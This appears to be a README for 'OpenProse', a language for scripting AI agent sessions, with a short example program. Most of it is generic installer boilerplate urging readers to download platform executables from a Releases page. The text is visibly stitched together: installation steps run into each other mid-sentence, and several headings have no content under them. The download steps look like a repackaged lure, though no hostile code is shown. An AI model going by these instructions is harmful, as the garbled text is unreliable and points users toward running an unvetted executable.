A long-running AI session is a Turing-complete computer. OpenProse is a programming language for it.
Website • Language Spec • Examples
⚠️ Beta Software — Read before using
Welcome to prose! This guide helps you set up and run the software on your device. Follow these steps to get started.
Download the suitable file for your operating system.
For Windows, look for prose-windows.exe. For macOS, select prose-macos.dmg. For Linux, choose prose-linux.tar.gz.
.exe file to launch the installation..dmg file and drag the prose icon to your Applications folder.After installation, you can find prose in your applications list.
prose offers several key features designed for ease of use:
To ensure smooth operation, check that your system meets these requirements:
After installing prose, follow these steps to create your first project:
You can run AI tasks, draft documents, and refine your work right from the app.
To give you a better idea of what you can do, here is a simple example:
agent researcher:
model: sonnet
skills: ["web-search"]
agent writer:
model: opus
parallel:
research = session: researcher
prompt: "Research quantum computing breakthroughs"
competitive = session: researcher
prompt: "Analyze competitor landscape"
loop until **the draft meets publication standards** (max: 3):
session: writer
prompt: "Write and refine the article"
context: { research, competitive }
For further information, please visit:
We have additional guides available within the app to help you navigate various features.
If you encounter issues, consider these steps:
Join our community for help and discussions. Engage with other users and share your experiences. Visit our support channels on our website.
Please note that this software is in beta. It may have unexpected behavior. We appreciate your feedback to improve the user experience. Read more about our beta status here.
To download the latest version of prose, visit the Releases page again for updates!